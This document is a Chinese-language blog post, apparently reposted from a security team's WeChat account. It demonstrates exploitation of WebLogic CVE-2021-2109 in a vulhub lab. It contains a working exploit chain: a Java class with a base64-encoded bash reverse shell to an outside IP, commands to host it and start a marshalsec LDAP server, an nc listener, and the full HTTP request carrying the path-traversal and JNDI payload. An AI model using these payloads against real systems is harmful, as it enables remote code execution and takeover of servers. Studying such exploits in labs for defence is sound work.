weblogic-CVE-2021-2109漏洞分析

  • A+
所属分类:安全文章


        在vulhub里找一个weblogic靶场进行搭建,本次实验使用的是14883靶场


启动后访问:

http://192.168.124.165:7001/console


weblogic-CVE-2021-2109漏洞分析


然后访问一下漏洞点:

http://192.168.124.165:7001/console/css/%252e%252e%252f/consolejndi.portal



weblogic-CVE-2021-2109漏洞分析

漏洞利用


1、首先编译一个恶意java文件,需要进行base64编码


import java.io.BufferedReader;import java.io.InputStream;import java.io.InputStreamReader; public class Exploit{  public Exploit() throws Exception {      //Process p =Runtime.getRuntime().exec(newString[]{"cmd","/c","calc.exe"});    Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyNC4xMjgvNjY2NiAwPiYx|base64-d |bash"});      InputStream is = p.getInputStream();      BufferedReader reader = new BufferedReader(new InputStreamReader(is));       String line;      while((line = reader.readLine()) != null) {          System.out.println(line);      }       p.waitFor();      is.close();      reader.close();      p.destroy();    }   public static void main(String[] args) throws Exception {    }}


把java程序进行编译,命令为:

Javac Exploit.java

会生成一个Exploit.class文件,讲这个文件放入web服务器中,确保让ladp能够调用到

这里使用python开启:

python -m SimpleHTTPServer 8000

访问一下看看是否正常工作


weblogic-CVE-2021-2109漏洞分析


2、使用marshalsec启动一个ladp服务器。

下载地址:https://github.com/mbechler/marshalsec

下载后切换到marshalsec目录下使用maven进行打包。

mvn clean package -DskipTests

 

weblogic-CVE-2021-2109漏洞分析

 

然后启动ldap服务:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jarmarshalsec.jndi.LDAPRefServer http://192.168.124.133:8000/#Exploit 9000


weblogic-CVE-2021-2109漏洞分析


3、开启nc监听:

nc -lvvp 6666


weblogic-CVE-2021-2109漏洞分析


4、发送exp成功反弹shell

Exp(注意ip的192.168.124;133是为分号):

 

GET /console/css/%252e%252e%252f/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.124;133:9000/a12345;AdminServer%22) HTTP/1.1Host: 192.168.124.165:7001Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0;WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie:ADMINCONSOLESESSION=KC0jqfXzn_Dy5s6jg9QVT79hzzFgEptBFkxDUQE_SJYogGpGLfPn!-1632926475Connection: close


weblogic-CVE-2021-2109漏洞分析


weblogic-CVE-2021-2109漏洞分析


本文始发于微信公众号(Khan安全团队):weblogic-CVE-2021-2109漏洞分析

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: